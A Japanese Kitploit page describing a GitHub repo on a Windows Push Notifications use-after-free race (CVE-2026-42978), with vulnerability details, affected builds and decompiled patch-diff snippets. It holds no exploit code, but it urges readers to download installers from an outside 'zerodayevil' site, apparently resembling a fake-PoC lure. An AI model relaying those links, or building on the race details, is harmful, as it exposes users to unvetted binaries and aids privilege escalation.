Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-42978-PoC-Research — CVE-2026-42978 Windows Push Notifications (WpnService) の Use-After-Free および Race Condition に関するPoC研究、診断スキャナー、ならびにAI Security Tool向けセキュリティ監査モジュール。 | Kitploit
ツール/GitHubGitHub/syntaxmethod/cve-2026-42978-poc-research
防御ツール特権昇格脆弱性スキャナー脆弱性分析エクスプロイト脅威インテリジェンス論文と研究学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHub
syntaxmethod/cve-2026-42978-poc-research

CVE-2026-42978-PoC-Research

CVE-2026-42978 Windows Push Notifications (WpnService) の Use-After-Free および Race Condition に関するPoC研究、診断スキャナー、ならびにAI Security Tool向けセキュリティ監査モジュール。

リポジトリを見るウェブサイト
942321日前未レビュー

CVE-2026-42978
AIセキュリティツール向けWindowsプッシュ通知モジュール

次世代AIセキュリティエコシステム、マルチプロトコルターミナル & 自律エージェントスイート


Latest Release Build Status Donations Telegram Channel License

ウェブサイト · 製品ドキュメント · ホストアプリケーション · コミュニティチャット

ウェブサイトナビゲーション: ホーム · アップデート · ダウンロード · モジュール

Module banner


公式ホストアプリケーション

製品: AI Security Tool
サイト: zerodayevil.github.io
ドキュメント: https://zerodayevil.github.io/ai-security-tool

このモジュールは、AI Security Tool 向けのレビュー済み解説記事であり、安全チェックプロファイルです。
プロジェクトサイトまたは公式カタログに掲載されているモジュールのみを使用してください。このモジュールは、承認されたアプリケーション内で、自身が所有するか、書面による評価許可を得たエンドポイントに対してのみロードしてください。

このリポジトリは、WpnService に対する武器化されたエクスプロイトを同梱していません。lab/ 配下のラボは、このクラスのバグ(TOCTOU / ダブルフェッチ)を模したスタンドアロンのモックです。実際のプッシュ通知サービスとは通信しません。


クイックスタート & インストール

まずホストアプリケーションをインストールしてください。その後、Modules → Windows / Local EoP → CVE-2026-42978 からこのモジュールを有効化します。

すぐに使えるビルド

OS / プラットフォームバージョンアーキテクチャ / 形式更新日ステータスダウンロード
Windowsv6.3.20x64 インストーラー (.exe)2026-09-08最新Download .exe
Windowsv6.3.20x64 ポータブル (.tar.gz)2026-09-08最新Download .tar.gz
macOSv5.3.29Apple Silicon (.dmg)2026-09-05安定版Download .dmg
Linuxv5.3.27ユニバーサル x64 (.tar.gz)2026-09-01安定版Download .tar.gz
Androidv5.3.27ARM64 APK (.apk)2026-09-01安定版Download .apk

公式ソースのみ:

  • https://zerodayevil.github.io/
  • https://zerodayevil.github.io/ai-security-tool
  • https://github.com/ZeroDayEvil/ai-security-tool

概念の概要

CVE-2026-42978 は、Windows プッシュ通知におけるローカル特権昇格です。Microsoft は、適切な同期なしに共有リソースへ同時アクセスする問題(CWE-362)として説明しています。パッチ適用済みと未適用の wpncore.dll の研究により、プラットフォームシャットダウン中の PresentationEndpointFacade におけるuse-after-free レースが明らかになっています。

WpnService はセッション 0 で NT AUTHORITY\SYSTEM(svchost.exe -k netsvcs -p)として実行されます。トースト、タイル、バッジの配信はこのサービスを経由します。このプロセスに対するレースに勝利することは、ローカルマシン上の SYSTEM 問題です。リモートの事前認証不要な DC のバグではありません。

ステータス: 2026年6月10日(Patch Tuesday)に修正済み。このページは防御的研究です。

これは CVE-2026-41089(Netlogon RCE)ではありません。コンポーネント、特権モデル、パッチ日が異なります。


仕様

項目値
CVECVE-2026-42978
BDUBDU:2026-08249
ベンダーアドバイザリMSRC — Windows Push Notifications EoP
深刻度高 · CVSS 3.1 7.8
脆弱性の種類CWE-362 競合状態 · シャットダウンパスにおける use-after-free
コンポーネントWindows Push Notifications · WpnService · wpncore.dll
攻撃ベクトルローカル
必要な特権低(認可されたローカルユーザー)
ユーザー操作不要
Patch Tuesday2026年6月10日
モジュール種別研究解説 + アプリ内安全チェック + 検出パック

対象範囲

プッシュ通知を搭載するクライアントおよびサーバー SKU。チケットをクローズする前に、MSRC で正確な KB を確認してください。

ファミリー備考
Windows 101809、21H2、22H2(該当する場合は x86 / x64 / ARM64)
Windows 1123H2、24H2、25H2、26H1
Windows Server2016 / 2019 / 2022 / 2025(コンポーネントが存在する場合はフルおよび Server Core)

公開されているサービス情報に基づく目安ビルド(常に MSRC を再確認してください):

ブランチ修正済みビルドの目安
Windows 11 23H222631.7219
Windows 11 24H226100.8655
Windows 11 25H226200.8655
Windows 11 26H128000.2269
wpncore.dll の例(24H2)脆弱 26100.8521 → 修正済み 26100.8655

根本原因(研究)

このファサードは通知 API 呼び出しをラップし、PresentationEndpointImpl に委譲します。プラットフォームのシャットダウン中に NotificationPlatform オブジェクトが破棄されます。歴史的に、いくつかのファサードメソッドは、シャットダウンフラグや共有ロックを伴わずにプラットフォームポインタを取得していました。もしティアダウンがレースに勝利すると、次の呼び出しはダングリングポインタを使用します。

Facade, platform, shutdown guard

同じロックとガードのパターンが、49 個の PresentationEndpointFacade::* メソッド全体に適用されました。その下の実装メソッドはそのままにされました。穴はファサードにありました。

未修正の形状(wpncore.dll 26100.8521)

// PresentationEndpointFacade::ToastUnblockAll — unpatched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    NotificationPlatformHandle::Get(this + 0x50);
    if (platform == NULL)
        Throw_Hr(...);
    return PresentationEndpointImpl::UnblockToastsForEachApp(...);
}

修正済みの形状(wpncore.dll 26100.8655)

// PresentationEndpointFacade::ToastUnblockAll — patched
long ToastUnblockAll(PresentationEndpointFacade *this) {
    if (Feature_4097557817::IsEnabled()) {
        AcquireSRWLockShared(&Wns::s_platformLock);
        if (Wns::s_platformShutdown)
            Throw_Hr(E_APPLICATION_EXITING);
        NotificationPlatformHandle::Get(this + 0x50);
        ReleaseSRWLockShared(&Wns::s_platformLock);
    }
}

Ghidra with unpatched and patched wpncore.dll open

パッチが追加するもの:

  1. AcquireSRWLockShared — リーダー・ライターロック。シャットダウンは排他を取得します。
  2. s_platformShutdown — ティアダウンが開始された場合、E_APPLICATION_EXITING で離脱します。
  3. WIL unique_storage による RAII 解放。これにより例外パスでもロックが解放されます。
  4. 段階的ロールアウト / ロールバック用の機能フラグ Feature_4097557817。

バイナリ差分の規模

ツールをダウンロード